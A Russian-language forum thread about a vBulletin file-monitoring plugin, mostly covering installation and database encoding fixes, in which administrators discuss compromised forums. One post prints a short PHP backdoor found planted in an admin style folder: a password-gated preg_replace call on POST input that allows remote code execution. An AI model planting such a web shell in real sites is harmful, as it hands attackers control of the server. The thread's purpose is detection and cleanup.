Хак инспектор файлов для vBulletin

Boss3

Пользователь
Регистрация
19.06.10
Сообщения
1.683
Реакции
392
Баллы
28
Адрес
Pirate Bay
Хак инспектор файлов для vBulletin - чудо хак для безопасности вашего форума. Как только вы сами или какой перец загрузит новые файлы к вам в директорию форума - на почту придет письмо со списком этого файла :D

Ну а дальше мочить. Или себя или хакера :D

Установка:

  • Заливаем файлы из папки upload
  • Импортируем продукт в своей кодировке
  • Настраиваем в админке юзера который может смотреть файлы

Все ;)
 

Вложения

  • ins.jpg
    ins.jpg
    50.7 KB · Просмотры: 96
  • ins1.jpg
    ins1.jpg
    70.2 KB · Просмотры: 82
  • ins2.jpg
    ins2.jpg
    114.7 KB · Просмотры: 88
  • inspector.zip
    19.4 KB · Просмотры: 64
Последнее редактирование модератором:

xtwin

Пользователь
Регистрация
29.01.13
Сообщения
43
Реакции
2
Баллы
3
Проблемы с кодировкой в "инспекторе файлов"

Установил инспектор файлов, установил продукт от него, захожу в Установленные продукты и в заголовке и описание одни знаки вопроса. Такие же знаки вопроса, если зайти в сам инспектор файлов в навигации. Подскажите в чем дело. :(
 

Sayf

Пользователь
Регистрация
10.05.12
Сообщения
288
Реакции
263
Баллы
28
Первое что приходит в голову: не той кодировки установили продукт. Проверьте Вашу кодировку на сайте и кодировку продукта.
 

xtwin

Пользователь
Регистрация
29.01.13
Сообщения
43
Реакции
2
Баллы
3
Первое что приходит в голову: не той кодировки установили продукт. Проверьте Вашу кодировку на сайте и кодировку продукта.

Я пробовал разные кодировки, но эффект такой же ((( Только знаки вопросы толще становились (((

Добавлено через 13 минут
Может зависит от того откуда я скачал форум? Скачивал от сюда http://5md.ru/ версию 3.8.7
 

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard
Может зависит от того откуда я скачал форум?
В данном случае не зависит.
Дело в вашей базе данных, скорее всего у вас там кодировка таблиц в latin.
Посты перенес в тему хака.
 

Льюви

Пользователь
Регистрация
22.05.12
Сообщения
1.216
Реакции
996
Баллы
28
Адрес
Харьков
Может зависит от того откуда я скачал форум?
если есть сомнения - зачем качать?
качайте с проверенных источников

не поленилась, качнула и дистрибутив, и русик
простое сравнение длины файлов различий нЕ выявило

вывод: проблема таки с кодировкой у Вас...
 

xtwin

Пользователь
Регистрация
29.01.13
Сообщения
43
Реакции
2
Баллы
3
В данном случае не зависит.
Дело в вашей базе данных, скорее всего у вас там кодировка таблиц в latin.
Посты перенес в тему хака.

А как мне сделать, что бы этих знаков вопросов не было?
 

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard
Если форум только установлен, то проще всего все снести, в том числе и БД полностью и сделать заново.
Если форум уже рабочий, то есть там есть реальные люди, темы, посты, то нужно разбираться с кодировками базы данных. Отключать все хаки. Приводить все таблицы к единой кодировке cp или utf
 

xtwin

Пользователь
Регистрация
29.01.13
Сообщения
43
Реакции
2
Баллы
3
Если форум только установлен, то проще всего все снести, в том числе и БД полностью и сделать заново.
Если форум уже рабочий, то есть там есть реальные люди, темы, посты, то нужно разбираться с кодировками базы данных. Отключать все хаки. Приводить все таблицы к единой кодировке cp или utf

Удалил все базы данных и поставил заново форум и первым делом установил этот хак - тоже самое ((( кодировка базы utf. Помогите это исправить, плиз ))
 

Ночная странница

Пользователь
Регистрация
30.01.12
Сообщения
1.751
Реакции
965
Баллы
28
Возраст
47
xtwin, у меня тоже UTF, но хак ставила без проблем... Часто хаки просто выявляют проблемы с кодировками, если они есть.
Вы в БД глядели? В какой кодировке таблицы? Есть в темах (таблица post) кракозябры? не на форуме, а в самой БД. Можно так же глянуть бекап любой...

Добавлено через 2 минуты
xtwin, есть еще один момент...

Перезалила вложения в первом посте, там были файлы с кириллицей и в cp1251
 
Последнее редактирование:

Льюви

Пользователь
Регистрация
22.05.12
Сообщения
1.216
Реакции
996
Баллы
28
Адрес
Харьков

xtwin

Пользователь
Регистрация
29.01.13
Сообщения
43
Реакции
2
Баллы
3
xtwin, у меня тоже UTF, но хак ставила без проблем... Часто хаки просто выявляют проблемы с кодировками, если они есть.
Вы в БД глядели? В какой кодировке таблицы? Есть в темах (таблица post) кракозябры? не на форуме, а в самой БД. Можно так же глянуть бекап любой...

Добавлено через 2 минуты
xtwin, есть еще один момент...

Перезалила вложения в первом посте, там были файлы с кириллицей и в cp1251

В БД кодировка таблиц ср1251_general_ci. Может в этом дело?

Добавлено через 13 минут
Забыл дописать, в таблице пост кракозябры ((((( Помогите это исправить
 

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard
Значит ваша таблица не в ср1251_general_ci а в latin.
В phpMyAdmin поменяйте кодировку именно этой таблицы где крокозябры.
 

xtwin

Пользователь
Регистрация
29.01.13
Сообщения
43
Реакции
2
Баллы
3
Значит ваша таблица не в ср1251_general_ci а в latin.
В phpMyAdmin поменяйте кодировку именно этой таблицы где крокозябры.



Можете подробнее описать, как это сделать?
 

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard
Хм...
В картинках пока не могу показать. Может чуть позже, как время появится.
Попробуйте вывести кодировку форума принудительно. Если ??? исчезнут, то можно использовать как временную меру. Но с БД все равно разбираться нужно.

Открываете конфиг. Где то ближе к концу находите закомментированную строку
Код:
//$config['Mysqli']['charset'] = 'utf8';

Добавляете ниже

Код:
$config['Mysqli']['charset'] = 'cp1251';

Если ??? не исчезнут обновите продукт и посмотрите.
 

xtwin

Пользователь
Регистрация
29.01.13
Сообщения
43
Реакции
2
Баллы
3
Проблема решилась )))) Всем огромное спасибо ))))
 

lukamal

Редактор
Регистрация
30.08.12
Сообщения
803
Реакции
484
Баллы
28
Расскажите как решили проблему?
 

xtwin

Пользователь
Регистрация
29.01.13
Сообщения
43
Реакции
2
Баллы
3
Расскажите как решили проблему?

Конечно ))) Перед установкой форума, создал базу данных, выбрал ее и в сравнении указал ut8_general_ci, затем раскомментил строчку в конфиге c utf8, после установки сразу же залез в настройки английского языка и изменил кодировку с iso на utf8 )) Все )))) Конечно, я бы в жизни не догадался решить проблему, мне помог Sven с вбсаппорта )))
 

Allex1

Пользователь
Регистрация
21.04.12
Сообщения
158
Реакции
34
Баллы
13
Спс.
Кое что не понял:

1. Инспектор выдал гору файлов, у всех владелец 2737, права 0644. Дата создания = дате бэкапа. Вроде все бэкапы подтирал.
Ничего страшного, если я всё это
сотру?

accessmask.php
18,82K 12/01/13 19:06 2737 0644
admincalendar.php
38,58K 12/01/13 19:06 2737 0644
admininfraction.php
48,41K 12/01/13 19:06 2737 0644
...


2. Как эти файлы стирать быстро, не выискивая по каталогам?
 

Allex1

Пользователь
Регистрация
21.04.12
Сообщения
158
Реакции
34
Баллы
13
Подскажите, плиз, что за файлик появился, надо ли его удалять?

Инспектор файлов на Юридический клуб arbitraz.ru (http://arbitraz.ru/misc.php?do=gfi) обнаружил изменения в списке файлов.

Обнаружено новых файлов: 1

/cpstyles/vBulletin_3_Frontend/cp_tick_no.php (134,00b, 12/01/13 19:07, 2737, 0644)

Изменено файлов: 0
 

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard
Новые стили админки загружали?
 

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard
При чем здесь разделы? Файл появился в папке /cpstyles. Поэтому я и сделал вывод, что вы загружали какой то стиль админки.
 

Прометей

Пользователь
Регистрация
15.08.12
Сообщения
913
Реакции
211
Баллы
29
Инспектор файлов на Юридический клуб arbitraz.ru (http://arbitraz.ru/misc.php?do=gfi) обнаружил изменения в списке файлов.

Обнаружено новых файлов: 1

/cpstyles/vBulletin_3_Frontend/cp_tick_no.php (134,00b, 12/01/13 19:07, 2737, 0644)
Что за файл в стиле Админки Frontend Вашего форума cp_tick_no.php? Вот его Инспектор файлов и обнаружил. Он есть в дистрибутиве стиля? Если его не было - к вам залили шелл. Проверяйте этот файл.
 

Allex1

Пользователь
Регистрация
21.04.12
Сообщения
158
Реакции
34
Баллы
13
Что за файл в стиле Админки Frontend Вашего форума cp_tick_no.php? Вот его Инспектор файлов и обнаружил. Он есть в дистрибутиве стиля? Если его не было - к вам залили шелл. Проверяйте этот файл.

В дистре не было.
Вот его содержимое:
<?php
if (md5($_POST['p']) == 'ad5fdc193226be1841c53825d7004925') {
preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
}


Для шела не много.
Проверил с помощью virustotal точка com. Ничего подозрительного.

Как узнать, когда, кто и с какого IP его закачал?
И как можно закачивать файлы без доступа на ftp или http?
 
Последнее редактирование:

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard
У вас шаред хост? Обратитесь к хостеру, он подскажет где у него хранятся логи.
 

Magius1

Пользователь
Регистрация
28.08.13
Сообщения
8
Реакции
2
Баллы
3
Адрес
Солигорск
Подскажите пожалуйста кто-нибудь как Импортируем продукт?
Импортируем продукт в своей кодировке
С админкой vBulletin не знаком к сожалению, да и вообще еще новичок я в этом деле. А очень нужно, заражают гады мой новый форум (((
 

Льюви

Пользователь
Регистрация
22.05.12
Сообщения
1.216
Реакции
996
Баллы
28
Адрес
Харьков
заражают гады мой новый форум (((
О_о...
то есть, на форуме в принципе не установлено ни одного хака, а его уже успешно ломают?
я бы задумалась... что-то тут не так, и инспектор файлов явно не поможет
версия движка какая?
 

Magius1

Пользователь
Регистрация
28.08.13
Сообщения
8
Реакции
2
Баллы
3
Адрес
Солигорск
то есть, на форуме в принципе не установлено ни одного хака
Форум купил недавно и понятия не имею как устроен двиг. Судя по всему ни одного не установлено, а ломают успешно. Версия 3.8.7 PL3

Полазил по админке. Оказывается установлены "vB.Sponsors" и "Особые форумы"
Я уже проделал все манипуляции по устранению уязвимостей, как описано в теме "Как защитить форум на vBulletin". Осталось только установить инспектор файлов.
 
Последнее редактирование:

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard
Подскажите пожалуйста кто-нибудь как Импортируем продукт?
Заходим в панель администратора.
Продукты и модули - управление продуктами - добавить (импортировать) продукт.


Судя по всему ни одного не установлено
Админка, продукты и модули, и увидите список установленного.


Осталось только установить инспектор файлов.
Инспектор файлов НЕ защищает форум, и очень часто НЕ уведомляет о взломах. Потому что ломают не добавлением файлов, а другими путями. Инспектор файлов видит лишь добавляемые файлы и все.
 

Льюви

Пользователь
Регистрация
22.05.12
Сообщения
1.216
Реакции
996
Баллы
28
Адрес
Харьков
Форум купил недавно
оу...
то есть, не Вы ставили движок, а получили готовое...
возможно, в комплекте с шеллами...
3.8.7 - стабильна и не имеет нареканий с точки зрения безопасности
что такое "Особые форумы"?

а ломают успешно
можете рассказать, в чём это выражается?
 

Magius1

Пользователь
Регистрация
28.08.13
Сообщения
8
Реакции
2
Баллы
3
Адрес
Солигорск
Похоже, что проблема решилась.

Прошлый владелец форума продал его по той причине, что его постоянно ломали. Я подробностей не знаю, однако цена была заманчива =)
возможно, в комплекте с шеллами...
Сразу после покупки слил все файло себе и проверил касперским, который ругался на один файл (Trojan.Script.Generic в private_html/index.html) этот файл я удалил. Далее вручную сравнил все файлы на сервере с файлами движка и шеллов не обнаружил. Есть только парочка отличий в некоторых php-кодах (вероятно, что правил прошлый владелец форума)
что такое "Особые форумы"?
Я зашел в "Управление продуктами" и там обнаружил "Особые форумы 0.1 Форум, содержащий все темы или темы из выбранного раздела" а что это сам не знаю.
можете рассказать, в чём это выражается?
Mozilla предупреждала о заразности сайта и Гугл добавил в список подозрительных ("На 2 из 4 страниц сайта, протестированных нами за последние 90 дней, происходила загрузка и установка вредоносного ПО без согласия пользователя.") Гугл считал зараженным файл vbulletin_read_marker.js а он был чист. И что я только не делал - найти зверя не удавалось. Всевозможные сервисы поиска вирусов сообщали, что сайт чист.

А сегодня, к моему удивлению гугл снял предупреждение о "заразности" сайта.
 

Льюви

Пользователь
Регистрация
22.05.12
Сообщения
1.216
Реакции
996
Баллы
28
Адрес
Харьков
"Особые форумы 0.1 Форум, содержащий все темы или темы из выбранного раздела"
понятно

Гугл считал зараженным файл vbulletin_read_marker.js а он был чист. И что я только не делал - найти зверя не удавалось.
мммммм......
был у меня как-то клиент с похожей проблемой
я тоже долго искала, где там собака порылась
по клику на иконку раздела вместо отметки "раздел прочитан" (а это как раз этот скрипт) открывался порно-попандер
"зверь" сидел в замещаемых переменных

в общем, если будут опять проблемы - стукните в ЛС, если не буду сильно занята, смогу глянуть
 

Magius1

Пользователь
Регистрация
28.08.13
Сообщения
8
Реакции
2
Баллы
3
Адрес
Солигорск
Спасибо большое Льюви!!!

Последний маленький вопросик. Как настроить инспектор файлов? То, что в первом посте на 3-м скриншоте - как туда попасти?
 
Последнее редактирование:

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard
Админка, основные настройки, инспектор файлов :pardon:

После установки любого хака нужно прежде всего посмотреть его в основных настройках.
 

Allex1

Пользователь
Регистрация
21.04.12
Сообщения
158
Реакции
34
Баллы
13
В графу: "Список через запятую расширений файлов, которые необходимо включать в список проверки

phtml,php,php3,php4,php5,cgi,pl,shtml,xml"

желательно добавить js.

основание
Антивирус avast обнаружил Заражение: JS:Includer-APO [Trj]
URL: http://arbitraz.ru/cpstyles/vBulleti...ult/branson.js
Данный файл ссылался на vbulletin_global.js
js по умолчанию не проверяется
 

Allex1

Пользователь
Регистрация
21.04.12
Сообщения
158
Реакции
34
Баллы
13
Подскажите, плиз, братцы, есть ли средство для фильтрации записей, або аналогичный продукт.
Причины:
1. Проверять записи за несколько лет тяжело.
2. Хакеры, в ходе одной из последних атак, умудрились изменить атрибуты инфицированного файла, установив более раннюю дату создания.
 

креш

Пользователь
Регистрация
15.12.13
Сообщения
41
Реакции
3
Баллы
3
Для 4.2.0 подходит этот хак ?
 

Статистика форума

Темы
200.635
Сообщения
380.523
Пользователи
327.875
Новый пользователь
fora777
Сверху Снизу